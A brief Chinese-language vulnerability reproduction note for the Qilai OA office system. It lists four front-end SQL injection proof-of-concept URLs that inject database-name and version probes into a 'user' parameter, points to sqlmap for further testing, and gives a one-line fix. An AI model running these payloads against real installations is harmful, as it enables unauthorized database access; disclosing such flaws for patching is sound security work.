简介
启莱OA的是协同OA办公系统,在多个领域均有应用。企业厂商暂不详,但被爆出前台存在4个sql注入点。
漏洞复现
使用url拼接一下路由
POC1
/client/messageurl.aspx?user=' and (select db_name())>0--&pwd=1
POC2
/client/treelist.aspx?user=' and (select db_name())>0--&pwd=1
POC3
/client/CloseMsg.aspx?user=' and (select db_name())>0--&pwd=1
POC4
/client/GetUser.aspx?user=' and @@version>0--
如果回显如下 则可能存在sql注入
后续可使用sqlmap进行测试检查
修复建议
设置拦截 限制访问